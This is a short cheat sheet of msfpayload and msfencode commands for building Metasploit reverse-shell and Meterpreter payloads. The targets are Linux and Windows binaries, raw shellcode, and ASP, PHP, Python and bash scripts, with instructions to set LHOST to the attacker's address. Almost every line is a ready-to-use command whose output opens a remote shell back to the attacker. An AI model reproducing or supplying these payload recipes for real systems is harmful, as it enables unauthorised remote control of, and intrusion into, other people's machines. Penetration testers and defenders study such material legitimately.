Creating Metasploit Payloads
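Run 'set payload' for the relevant payload, configure all required options (LHOST, LPORT, etc.), execute, and wait for the payload to run. The examples below are largely self-explanatory, but LHOST should be filled in with your IP address (the LAN IP when attacking inside the network, the WAN IP when attacking across the internet), and LPORT should be the port you wish to be connected back on.
List payloads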
msfpayload -l
Create a Linux Reverse Meterpreter Binary
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
Create Reverse Shell (Shellcode)
msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b "\x00\x0a\x0d"
Create a Reverse Shell Python Script
msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp
Create a Reverse Bash Shell
msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
Create a Reverse PHP Shell
msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
Edit shell.php in a text editor to add <?php at the beginning.
Create a Windows Reverse Meterpreter Binary
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe